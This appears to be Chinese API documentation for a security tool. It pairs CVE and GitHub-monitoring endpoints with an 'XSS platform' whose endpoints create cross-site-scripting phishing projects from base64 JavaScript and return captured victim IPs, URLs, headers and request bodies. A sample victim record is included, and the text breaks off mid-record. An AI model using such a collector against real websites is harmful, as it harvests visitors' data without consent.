目录导航
GitHub监控详情
/api/github_monitor/
GitHubCVE数查询接口
{
"token": "xxx",
"number_of_pages": "xxx",
}
参数解释
token
登录后返回的tokennumber_of_pages
页码数
返回状态码
- 200:返回查询到的数据
{
"message": {
"amount": 351,
"data": [{
"github_id": "226311004",
"name": "cve_feeds",
"html_url": "https://github.com/AppThreat/cve_feeds",
"created_at": "2019-12-06T11:07:01Z",
"updated_at": "2021-01-04T08:21:49Z",
"pushed_at": "2021-01-04T08:21:46Z",
"forks_count": "6",
"watchers_count": "7"
}, {
"github_id": "300791308",
"name": "cvebase.com",
"html_url": "https://github.com/cvebase/cvebase.com",
"created_at": "2020-10-03T03:58:04Z",
"updated_at": "2020-12-30T22:21:09Z",
"pushed_at": "2020-12-30T22:21:10Z",
"forks_count": "22",
"watchers_count": "61"
}, {
"github_id": "306793101",
"name": "CVE_REQUEST-apache",
"html_url": "https://github.com/plr47/CVE_REQUEST-apache",
"created_at": "2020-10-24T02:55:10Z",
"updated_at": "2020-10-24T05:48:22Z",
"pushed_at": "2020-10-24T05:48:20Z",
"forks_count": "0",
"watchers_count": "3"
}, {
"github_id": "223232536",
"name": "php-version-audit",
"html_url": "https://github.com/lightswitch05/php-version-audit",
"created_at": "2019-11-21T17:54:51Z",
"updated_at": "2021-01-04T05:18:57Z",
"pushed_at": "2021-01-04T05:18:59Z",
"forks_count": "14",
"watchers_count": "79"
}, {
"github_id": "195458483",
"name": "cvelist",
"html_url": "https://github.com/vmcommunity/cvelist",
"created_at": "2019-07-05T19:30:48Z",
"updated_at": "2021-01-04T03:31:16Z",
"pushed_at": "2021-01-04T03:31:13Z",
"forks_count": "6",
"watchers_count": "8"
}]
}
"code": 200
}
- 返回参数解释
amount
所有个数数量data
详细数据,会有多个数组的集合github_id
任务IDname
目标连接html_url
项目连接created_at
项目创建时间updated_at
项目更新时间pushed_at
项目推送时间forks_count
项目fork数量watchers_count
项目star数量
- 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 404:非法查询哦宝贝!
- 500:请使用Post请求
GitHub监控数据搜索
/api/github_monitor_search/
GitHub监控数据搜索
{
"token": "xxx",
"name": "xxx",
"number_of_pages": "xxx"
}
参数解释
token
登录后返回的tokenname
要搜索的项目名称number_of_pages
页码数
返回状态码
- 200:返回查询到的数据
{
"message": {
"amount": 2,
"data": [{
"github_id": "349467219",
"name": "CVEs",
"html_url": "https://github.com/s1vona/CVEs",
"created_at": "2021-03-19T15:20:24Z",
"updated_at": "2021-05-10T13:53:20Z",
"pushed_at": "2021-05-10T13:53:17Z",
"forks_count": "0",
"watchers_count": "0"
}, {
"github_id": "366957392",
"name": "cves",
"html_url": "https://github.com/sebaslavigne/cves",
"created_at": "2021-05-13T06:36:10Z",
"updated_at": "2021-07-27T23:15:47Z",
"pushed_at": "2021-07-27T23:15:44Z",
"forks_count": "0",
"watchers_count": "0"
}]
},
"code": 200
}
返回参数解释
amount
所有个数数量data
详细数据,会有多个数组的集合github_id
任务IDname
目标连接html_url
项目连接created_at
项目创建时间updated_at
项目更新时间pushed_at
项目推送时间forks_count
项目fork数量watchers_count
项目star数量
- 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 404:非法查询哦宝贝!
- 500:请使用Post请求
监控首页精简数据查询
/api/nist_data_bulk_query/
CVE监控首页精简数据查询
{
"token": "xxx",
"number_of_pages":"20"
}
参数解释
token
登录后返回的tokennumber_of_pages
页数,传入的值必须大于0
返回状态码
- 200:返回查询到的数据(为了文档可观,只列出部分数据,正常数据为100条)
{
"message": [{
"vulnerability_number": "CVE-2003-0267",
"v3_base_score": "",
"v3_base_severity": "",
"v2_base_score": "5.0",
"v2_base_severity": "MEDIUM",
"last_up_date": "2016-10-18",
"vulnerability_description": "ShowGodLog.dll in SLWebMail 3 on Windows systems allows remote attackers to read arbitrary files by directly calling ShowGodLog.dll with an argument specifying the full path of the target file.",
"vendors": "['Bvrp Software']",
"products": "['Slwebmail']"
}, {
"vulnerability_number": "CVE-2003-0268",
"v3_base_score": "",
"v3_base_severity": "",
"v2_base_score": "5.0",
"v2_base_severity": "MEDIUM",
"last_up_date": "2016-10-18",
"vulnerability_description": "SLWebMail 3 on Windows systems allows remote attackers to identify the full path of the server via invalid requests to DLLs such as WebMailReq.dll, which reveals the path in an error message.",
"vendors": "['Bvrp Software']",
"products": "['Slwebmail']"
}, {
"vulnerability_number": "CVE-2003-0269",
"v3_base_score": "",
"v3_base_severity": "",
"v2_base_score": "7.2",
"v2_base_severity": "HIGH",
"last_up_date": "2017-07-11",
"vulnerability_description": "Buffer overflow in youbin allows local users to gain privileges via a long HOME environment variable.",
"vendors": "['Youbin']",
"products": "['Youbin']"
}, {
"vulnerability_number": "CVE-2003-0367",
"v3_base_score": "",
"v3_base_severity": "",
"v2_base_score": "2.1",
"v2_base_severity": "LOW",
"last_up_date": "2019-05-23",
"vulnerability_description": "znew in the gzip package allows local users to overwrite arbitrary files via a symlink attack on temporary files.",
"vendors": "['Gnu', 'Debian']",
"products": "['Gzip', 'Debian Linux']"
}],
"code": 200
}
- 返回参数解释会有多个数组的集合
vulnerability_number
漏洞编号v3_base_score
CVSS v3 分数v3_base_severity
CVSS v3 分级v2_base_score
CVSS v2 分数v2_base_severity
CVSS v2 分级last_up_date
最后更新时间vulnerability_description
漏洞说明vendors
开发商名称products
产品名称
- 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
- 503:你家有小于0的页码?
单个CVE详情查询
/api/nist_data_detailed_query/
获取单个详细的CVE编号
{
"token": "xxx",
"common_vulnerabilities_and_exposures":"CVE-2021-3177"
}
参数解释
token
登录后返回的tokencommon_vulnerabilities_and_exposures
CVE编号
返回状态码
- 200:返回查询到的数据,message中为需要用到的原始数据
{
"message": "{'cve': {'data_type': 'CVE', 'data_format': 'MITRE', 'data_version': '4.0', 'CVE_data_meta': {'ID': 'CVE-2021-3177', 'ASSIGNER': '[email protected]'}, 'problemtype': {'problemtype_data': [{'description': [{'lang': 'en', 'value': 'CWE-120'}]}]}, 'references': {'reference_data': [{'url': 'https://bugs.python.org/issue42938', 'name': 'https://bugs.python.org/issue42938', 'refsource': 'MISC', 'tags': ['Exploit', 'Patch', 'Vendor Advisory']}, {'url': 'https://github.com/python/cpython/pull/24239', 'name': 'https://github.com/python/cpython/pull/24239', 'refsource': 'MISC', 'tags': ['Patch', 'Third Party Advisory']}, {'url': 'https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E', 'name': '[mina-dev] 20210225 [jira] [Created] (FTPSERVER-500) Security vulnerability in common/lib/log4j-1.2.17.jar', 'refsource': 'MLIST', 'tags': []}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/BRHOCQYX3QLDGDQGTWQAUUT2GGIZCZUO/', 'name': 'FEDORA-2021-42ba9feb47', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/CCFZMVRQUKCBQIG5F2CBVADK63NFSE4A/', 'name': 'FEDORA-2021-ced31f3f0c', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/FONHJIOZOFD7CD35KZL6SVBUTMBPGZGA/', 'name': 'FEDORA-2021-907f3bacae', 'refsource': 'FEDORA', 'tags': []}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/FPE7SMXYUIWPOIZV4DQYXODRXMFX3C5E/', 'name': 'FEDORA-2021-d5cde50865', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/HCQTCSP6SCVIYNIRUJC5X7YBVUHPLSC4/', 'name': 'FEDORA-2021-7547ad987f', 'refsource': 'FEDORA', 'tags': ['Mailing List', 'Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/MGSV6BJQLRQ6RKVUXK7JGU7TP4QFGQXC/', 'name': 'FEDORA-2021-faf88b9499', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/MP572OLHMS7MZO4KUPSCIMSZIA5IZZ62/', 'name': 'FEDORA-2021-3352c1c802', 'refsource': 'FEDORA', 'tags': ['Mailing List', 'Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/NODWHDIFBQE5RU5PUWUVE47JOT5VCMJ2/', 'name': 'FEDORA-2021-f4fd9372c7', 'refsource': 'FEDORA', 'tags': ['Mailing List', 'Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/NQPARTLNSFQVMMQHPNBFOCOZOO3TMQNA/', 'name': 'FEDORA-2021-cc3ff94cfc', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/NXSMBHES3ANXXS2RSO5G6Q24BR4B2PWK/', 'name': 'FEDORA-2021-076a2dccba', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/V6XJAULOS5JVB2L67NCKKMJ5NTKZJBSD/', 'name': 'FEDORA-2021-851c6e4e2d', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/Y4KSYYWMGAKOA2JVCQA422OINT6CKQ7O/', 'name': 'FEDORA-2021-17668e344a', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/YDTZVGSXQ7HR7OCGSUHTRNTMBG43OMKU/', 'name': 'FEDORA-2021-66547ff92d', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/Z7GZV74KM72O2PEJN2C4XP3V5Q5MZUOO/', 'name': 'FEDORA-2021-e3a5a74610', 'refsource': 'FEDORA', 'tags': ['Third Party Advisory']}, {'url': 'https://news.ycombinator.com/item?id=26185005', 'name': 'https://news.ycombinator.com/item?id=26185005', 'refsource': 'MISC', 'tags': ['Third Party Advisory']}, {'url': 'https://python-security.readthedocs.io/vuln/ctypes-buffer-overflow-pycarg_repr.html', 'name': 'https://python-security.readthedocs.io/vuln/ctypes-buffer-overflow-pycarg_repr.html', 'refsource': 'MISC', 'tags': ['Patch', 'Third Party Advisory']}, {'url': 'https://security.gentoo.org/glsa/202101-18', 'name': 'GLSA-202101-18', 'refsource': 'GENTOO', 'tags': ['Third Party Advisory']}, {'url': 'https://security.netapp.com/advisory/ntap-20210226-0003/', 'name': 'https://security.netapp.com/advisory/ntap-20210226-0003/', 'refsource': 'CONFIRM', 'tags': []}]}, 'description': {'description_data': [{'lang': 'en', 'value': 'Python 3.x through 3.9.1 has a buffer overflow in PyCArg_repr in _ctypes/callproc.c, which may lead to remote code execution in certain Python applications that accept floating-point numbers as untrusted input, as demonstrated by a 1e300 argument to c_double.from_param. This occurs because sprintf is used unsafely.'}]}}, 'configurations': {'CVE_data_version': '4.0', 'nodes': [{'operator': 'OR', 'cpe_match': [{'vulnerable': True, 'cpe23Uri': 'cpe:2.3:a:python:python:*:*:*:*:*:*:*:*', 'versionStartIncluding': '3.6.0', 'versionEndIncluding': '3.6.12'}, {'vulnerable': True, 'cpe23Uri': 'cpe:2.3:a:python:python:*:*:*:*:*:*:*:*', 'versionStartIncluding': '3.7.0', 'versionEndIncluding': '3.7.9'}, {'vulnerable': True, 'cpe23Uri': 'cpe:2.3:a:python:python:*:*:*:*:*:*:*:*', 'versionStartIncluding': '3.8.0', 'versionEndIncluding': '3.8.7'}, {'vulnerable': True, 'cpe23Uri': 'cpe:2.3:a:python:python:*:*:*:*:*:*:*:*', 'versionStartIncluding': '3.9.0', 'versionEndIncluding': '3.9.1'}]}, {'operator': 'OR', 'cpe_match': [{'vulnerable': True, 'cpe23Uri': 'cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*'}, {'vulnerable': True, 'cpe23Uri': 'cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*'}]}]}, 'impact': {'baseMetricV3': {'cvssV3': {'version': '3.1', 'vectorString': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H', 'attackVector': 'NETWORK', 'attackComplexity': 'LOW', 'privilegesRequired': 'NONE', 'userInteraction': 'NONE', 'scope': 'UNCHANGED', 'confidentialityImpact': 'HIGH', 'integrityImpact': 'HIGH', 'availabilityImpact': 'HIGH', 'baseScore': 9.8, 'baseSeverity': 'CRITICAL'}, 'exploitabilityScore': 3.9, 'impactScore': 5.9}, 'baseMetricV2': {'cvssV2': {'version': '2.0', 'vectorString': 'AV:N/AC:L/Au:N/C:P/I:P/A:P', 'accessVector': 'NETWORK', 'accessComplexity': 'LOW', 'authentication': 'NONE', 'confidentialityImpact': 'PARTIAL', 'integrityImpact': 'PARTIAL', 'availabilityImpact': 'PARTIAL', 'baseScore': 7.5}, 'severity': 'HIGH', 'exploitabilityScore': 10.0, 'impactScore': 6.4, 'acInsufInfo': False, 'obtainAllPrivilege': False, 'obtainUserPrivilege': False, 'obtainOtherPrivilege': False, 'userInteractionRequired': False}}, 'publishedDate': '2021-01-19T06:15Z', 'lastModifiedDate': '2021-02-26T09:15Z'}",
"code": 200
}
- 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
CVE编号数据个数统计
/api/nist_statistics/
获取CVE编号数据个数
{
"token": "xxx"
}
参数解释
token
登录后返回的token
返回状态码
- 200:返回查询到的数据,为漏洞个数
{"message": 76534, "code": 200}
- 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
严重性筛选查询
/api/nist_severity_filter/
对于严重性等级筛选
{
"token": "xxx",
"number_of_pages":"0",
"severity":"xxxx"
}
参数解释
token
登录后返回的tokennumber_of_pages
页数,传入的值必须大于0severity
严重性等级,可传入参数:NONE、LOW、MEDIUM、HIGH、CRITICAL
返回状态码
- 200:返回查询到的数据(为了文档可观,只列出部分数据,正常数据为100条)
{
"message": {
"total": 2588,
"data": [{
"vulnerability_number": "CVE-2021-0109",
"v3_base_score": "7.8",
"v3_base_severity": "HIGH",
"v2_base_score": "4.6",
"v2_base_severity": "MEDIUM",
"last_up_date": "2021-02-22",
"vulnerability_description": "Insecure inherited permissions for the Intel(R) SOC driver package for STK1A32SC before version 604 may allow an authenticated user to potentially enable escalation of privilege via local access.",
"vendors": "",
"products": ""
}, {
"vulnerability_number": "CVE-2021-0202",
"v3_base_score": "7.5",
"v3_base_severity": "HIGH",
"v2_base_score": "5.0",
"v2_base_severity": "MEDIUM",
"last_up_date": "2021-01-21",
"vulnerability_description": "On Juniper Networks MX Series and EX9200 Series platforms with Trio-based MPC (Modular Port Concentrator) where Integrated Routing and Bridging (IRB) interface is configured and it is mapped to a VPLS instance or a Bridge-Domain, certain network events at Customer Edge (CE) device may cause memory leak in the MPC which can cause an out of memory and MPC restarts. When this issue occurs, there will be temporary traffic interruption until the MPC is restored. An administrator can use the following CLI command to monitor the status of memory usage level of the MPC: user@device> show system resource-monitor fpc FPC Resource Usage Summary Free Heap Mem Watermark : 20 % Free NH Mem Watermark : 20 % Free Filter Mem Watermark : 20 % * - Watermark reached Slot # % Heap Free RTT Average RTT 1 87 PFE # % ENCAP mem Free % NH mem Free % FW mem Free 0 NA 88 99 1 NA 89 99 When the issue is occurring, the value of \u201c% NH mem Free\u201d will go down until the MPC restarts. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). Please refer to https://kb.juniper.net/KB25385 for the list of Trio-based PFEs. This issue affects Juniper Networks Junos OS on MX Series, EX9200 Series: 17.3R3-S8; 17.4R3-S2; 18.2R3-S4, 18.2R3-S5; 18.3R3-S2, 18.3R3-S3; 18.4 versions starting from 18.4R3-S1 and later versions prior to 18.4R3-S6; 19.2 versions starting from 19.2R2 and later versions prior to 19.2R3-S1; 19.4 versions starting from 19.4R2 and later versions prior to 19.4R2-S3, 19.4R3; 20.2 versions starting from 20.2R1 and later versions prior to 20.2R1-S3, 20.2R2. This issue does not affect Juniper Networks Junos OS: 18.1, 19.1, 19.3, 20.1.",
"vendors": "",
"products": ""
}, {
"vulnerability_number": "CVE-2021-0208",
"v3_base_score": "8.8",
"v3_base_severity": "HIGH",
"v2_base_score": "3.3",
"v2_base_severity": "LOW",
"last_up_date": "2021-01-21",
"vulnerability_description": "An improper input validation vulnerability in the Routing Protocol Daemon (RPD) service of Juniper Networks Junos OS allows an attacker to send a malformed RSVP packet when bidirectional LSPs are in use, which when received by an egress router crashes the RPD causing a Denial of Service (DoS) condition. Continued receipt of the packet will sustain the Denial of Service. This issue affects: Juniper Networks Junos OS: All versions prior to 17.3R3-S10 except 15.1X49-D240 for SRX series; 17.4 versions prior to 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S4; 18.3 versions prior to 18.3R3-S2; 18.4 versions prior to 18.4R1-S8, 18.4R2-S6, 18.4R3-S2; 19.1 versions prior to 19.1R1-S5, 19.1R3-S3; 19.2 versions prior to 19.2R3; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R2-S2, 19.4R3-S1; 20.1 versions prior to 20.1R1-S4, 20.1R2; 15.1X49 versions prior to 15.1X49-D240 on SRX Series. Juniper Networks Junos OS Evolved: 19.3 versions prior to 19.3R2-S5-EVO; 19.4 versions prior to 19.4R2-S2-EVO; 20.1 versions prior to 20.1R1-S4-EVO.",
"vendors": "",
"products": ""
}, {
"vulnerability_number": "CVE-2021-1195",
"v3_base_score": "7.2",
"v3_base_severity": "HIGH",
"v2_base_score": "9.0",
"v2_base_severity": "HIGH",
"last_up_date": "2021-01-15",
"vulnerability_description": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to execute arbitrary code or cause an affected device to restart unexpectedly. The vulnerabilities are due to improper validation of user-supplied input in the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system or cause the device to reload, resulting in a denial of service (DoS) condition. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. Cisco has not released software updates that address these vulnerabilities.",
"vendors": "",
"products": ""
}]
},
"code": 200
}
- 返回参数解释
total
该等级的漏洞个数data
里面存在当前页面100个数据,数据参数解释如下vulnerability_number
漏洞编号v3_base_score
CVSS v3 分数v3_base_severity
CVSS v3 分级v2_base_score
CVSS v2 分数v2_base_severity
CVSS v2 分级last_up_date
最后更新时间vulnerability_description
漏洞说明vendors
开发商名称products
产品名称
- 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
- 503:你家有小于0的页码?
厂商名称筛选查询
/api/nist_vendors_filter/
对于严重性等级筛选
{
"token": "xxx",
"number_of_pages":"0",
"vendors":"xxxx"
}
参数解释
token
登录后返回的tokennumber_of_pages
页数,传入的值必须大于0vendors
厂商名称
返回状态码
- 200:返回查询到的数据(为了文档可观,只列出部分数据,正常数据为100条)
{
"message": {
"total": 1673,
"data": [{
"vulnerability_number": "CVE-2021-0301",
"v3_base_score": "6.7",
"v3_base_severity": "MEDIUM",
"v2_base_score": "4.6",
"v2_base_severity": "MEDIUM",
"last_up_date": "2021-01-13",
"vulnerability_description": "In ged, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android SoC; Android ID: A-172514667.",
"vendors": "['Google']",
"products": "['Android']"
}, {
"vulnerability_number": "CVE-2021-0302",
"v3_base_score": "7.8",
"v3_base_severity": "HIGH",
"v2_base_score": "9.3",
"v2_base_severity": "HIGH",
"last_up_date": "2021-02-12",
"vulnerability_description": "In PackageInstaller, there is a possible tapjacking attack due to an insecure default value. This could lead to local escalation of privilege and permissions with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10Android ID: A-155287782",
"vendors": "['Google']",
"products": "['Android']"
}, {
"vulnerability_number": "CVE-2021-0303",
"v3_base_score": "7.0",
"v3_base_severity": "HIGH",
"v2_base_score": "6.9",
"v2_base_severity": "MEDIUM",
"last_up_date": "2021-01-13",
"vulnerability_description": "In dispatchGraphTerminationMessage() of packages/services/Car/computepipe/runner/graph/StreamSetObserver.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android; Versions: Android-11; Android ID: A-170407229.",
"vendors": "['Google']",
"products": "['Android']"
}, {
"vulnerability_number": "CVE-2021-21146",
"v3_base_score": "9.6",
"v3_base_severity": "CRITICAL",
"v2_base_score": "6.8",
"v2_base_severity": "MEDIUM",
"last_up_date": "2021-02-18",
"vulnerability_description": "Use after free in Navigation in Google Chrome prior to 88.0.4324.146 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.",
"vendors": "['Google', 'Fedoraproject']",
"products": "['Chrome', 'Fedora']"
}]
},
"code": 200
}
- 返回参数解释
total
该等级的漏洞个数data
里面存在当前页面100个数据,数据参数解释如下vulnerability_number
漏洞编号v3_base_score
CVSS v3 分数v3_base_severity
CVSS v3 分级v2_base_score
CVSS v2 分数v2_base_severity
CVSS v2 分级last_up_date
最后更新时间vulnerability_description
漏洞说明vendors
开发商名称products
产品名称
- 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
- 503:你家有小于0的页码?
产品名称筛选查询
/api/nist_products_filter/
对于严重性等级筛选
{
"token": "xxx",
"number_of_pages":"0",
"products":"xxxx"
}
参数解释
token
登录后返回的tokennumber_of_pages
页数,传入的值必须大于0products
产品名称
返回状态码
- 200:返回查询到的数据(为了文档可观,只列出部分数据,正常数据为100条)
{
"message": {
"total": 82,
"data": [{
"vulnerability_number": "CVE-2021-0204",
"v3_base_score": "7.8",
"v3_base_severity": "HIGH",
"v2_base_score": "7.2",
"v2_base_severity": "HIGH",
"last_up_date": "2021-01-21",
"vulnerability_description": "A sensitive information disclosure vulnerability in delta-export configuration utility (dexp) of Juniper Networks Junos OS may allow a locally authenticated shell user the ability to create and read database files generated by the dexp utility, including password hashes of local users. Since dexp is shipped with setuid permissions enabled and is owned by the root user, this vulnerability may allow a local privileged user the ability to run dexp with root privileges and access sensitive information in the dexp database. This issue affects Juniper Networks Junos OS: 15.1 versions prior to 15.1R7-S8; 15.1X49 versions prior to 15.1X49-D230; 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D34; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S7, 18.4R3-S6; 19.1 versions prior to 19.1R1-S6, 19.1R2-S2, 19.1R3-S3; 19.2 versions prior to 19.2R1-S5, 19.2R3-S1; 19.3 versions prior to 19.3R2-S5, 19.3R3-S1; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3-S1; 20.1 versions prior to 20.1R1-S4, 20.1R2; 20.2 versions prior to 20.2R1-S2, 20.2R2.",
"vendors": "['Juniper']",
"products": "['Junos']"
},{
"vulnerability_number": "CVE-2015-7751",
"v3_base_score": "",
"v3_base_severity": "",
"v2_base_score": "6.9",
"v2_base_severity": "MEDIUM",
"last_up_date": "2015-10-20",
"vulnerability_description": "Juniper Junos OS before 12.1X44-D50, 12.1X46 before 12.1X46-D35, 12.1X47 before 12.1X47-D25, 12.3 before 12.3R9, 12.3X48 before 12.3X48-D15, 13.2 before 13.2R7, 13.2X51 before 13.2X51-D35, 13.3 before 13.3R6, 14.1 before 14.1R5, 14.1X50 before 14.1X50-D105, 14.1X51 before 14.1X51-D70, 14.1X53 before 14.1X53-D25, 14.1X55 before 14.1X55-D20, 14.2 before 14.2R1, 15.1 before 15.1F2 or 15.1R1, and 15.1X49 before 15.1X49-D10 does not require a password for the root user when pam.conf is \"corrupted,\" which allows local users to gain root privileges by modifying the file.",
"vendors": "['Juniper']",
"products": "['Junos']"
}, {
"vulnerability_number": "CVE-2015-7752",
"v3_base_score": "",
"v3_base_severity": "",
"v2_base_score": "7.8",
"v2_base_severity": "HIGH",
"last_up_date": "2015-10-20",
"vulnerability_description": "The SSH server in Juniper Junos OS before 12.1X44-D50, 12.1X46 before 12.1X46-D35, 12.1X47 before 12.1X47-D25, 12.3 before 12.3R10, 12.3X48 before 12.3X48-D10, 13.2 before 13.2R8, 13.2X51 before 13.2X51-D35, 13.3 before 13.3R6, 14.1 before 14.1R5, 14.1X53 before 14.1X53-D25, 14.2 before 14.2R3, 15.1 before 15.1R1, and 15.1X49 before 15.1X49-D20 allows remote attackers to cause a denial of service (CPU consumption) via unspecified SSH traffic.",
"vendors": "['Juniper']",
"products": "['Junos']"
}]
},
"code": 200
}
- 返回参数解释会有多个数组的集合
total
该等级的漏洞个数data
里面存在当前页面100个数据,数据参数解释如下vulnerability_number
漏洞编号v3_base_score
CVSS v3 分数v3_base_severity
CVSS v3 分级v2_base_score
CVSS v2 分数v2_base_severity
CVSS v2 分级last_up_date
最后更新时间vulnerability_description
漏洞说明vendors
开发商名称products
产品名称
- 403:小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
- 503:你家有小于0的页码?
XSS平台
创建跨站脚本钓鱼项目
/api/create_cross_site_script_project/
用来创建跨站脚本项目
{
"token": "",
"project_name":"",
"javascript_data":""
}
参数解释
token
登录后返回的tokenproject_name
该项目的项目名javascript_data
进行过base64加密后的JS文件数据
返回状态码
- 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
- 200:创建后本地生成的js文件
- 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
修改跨站脚本钓鱼项目
/api/modify_cross_site_script_project/
用来修改跨站脚本项目
{
"token": "",
"project_associated_file_name":"",
"project_associated_file_data":""
}
参数解释
token
登录后返回的tokenproject_associated_file_name
该项目生成的文件名project_associated_file_data
需要对文件修改的数据,需要进行base64加密后传入
返回状态码
- 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
- 200:文件内容覆盖成功~
- 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 404:你没有查询这个项目的权限哦宝贝~
- 500:请使用Post请求
查询跨站脚本钓鱼项目
/api/query_cross_site_script_project/
用来查询用户的跨站脚本项目
{
"token": "",
}
参数解释
token
登录后返回的token
返回状态码
- 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
- 200:返回查询到的项目信息
{
"message": [{
"project_name": "123123",
"file_name": "HXKZM",
"creation_time": "1608208943"
}, {
"project_name": "test",
"file_name": "Ks1ZM",
"creation_time": "1628208943"
}],
"code": 200
}
- 返回参数解释会有多个数组的集合
project_name
项目名称file_name
文件名称creation_time
创建时间
- 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 500:请使用Post请求
查询跨站脚本钓鱼项目中数据
/api/query_cross_site_script_project_data/
用来查询用户的跨站脚本项目中的数据信息
{
"token": "",
"project_associated_file_name":""
}
参数解释
token
登录后返回的tokenproject_associated_file_name
项目中生成的特殊文件名,也就是/api/query_cross_site_scripting_project/接口传回的file_name数据
返回状态码
- 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
- 200:返回查询到的项目信息
{
"message": [{
"project_name": "123123",
"file_name": "HXKZM",
"creation_time": "1608208943"
}, {
"project_name": "test",
"file_name": "Ks1ZM",
"creation_time": "1628208943"
}],
"code": 200
}
headers
受害者请求头数据,需要base64解密project_associated_file_name
文件名称ip
受害者IPfull_url
受害者请求完整路径creation_time
受害者请求连接request_method
请求方式data_pack
请求数据包,需要base64解密
- 403:嘿~宝贝这是非法查询哦(๑•̀ㅂ•́)و✧
- 404:你没有查询这个项目的权限哦宝贝~
- 500:请使用Post请求
查询跨站脚本钓鱼项目详细信息
/api/query_cross_site_script_project_info/
用来查询用户的跨站脚本项目的详细信息
{
"token": "",
"project_associated_file_name":""
}
参数解释
token
登录后返回的tokenproject_associated_file_name
创建项目是生成的文件,创建项目时会返回
返回状态码
- 169:呐呐呐!莎酱被玩坏啦(>^ω^<)
- 200:返回项目中js文件的详细信息,内容通过base64编码过,以及几个POC的利用语句
{
"message": [{
"headers": "eydDb250ZW50LUxlbmd0aCc6ICcnLCAnQ29udGVudC1UeXBlJzogJ3RleHQvcGxhaW4nLCAnSG9zdCc6ICcxMDEuMzcuMTQuMTQ0Ojg4ODgnLCAnVXNlci1BZ2VudCc6ICdNb3ppbGxhLzUuMCAoTWFjaW50b3NoOyBJbnRlbCBNYWMgT1MgWCAxMF8xNV80KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvODcuMC40MjgwLjg4IFNhZmFyaS81MzcuMzYnLCAnQWNjZXB0JzogJyovKicsICdBY2NlcHQtRW5jb2RpbmcnOiAnZ3ppcCwgZGVmbGF0ZScsICdBY2NlcHQtTGFuZ3VhZ2UnOiAnemgtQ04semg7cT0wLjknLCAnQ29ubmVjdGlvbic6ICdjbG9zZSd9",
"project_associated_file_name": "KE29b",
"ip": "142.3.56.28",
"full_url": "http://1127.0.0.1:8888/a/KE29b/",
"creation_time": "1609233542",
"request_method": "GET",
"data_pack": "e30="
}, {
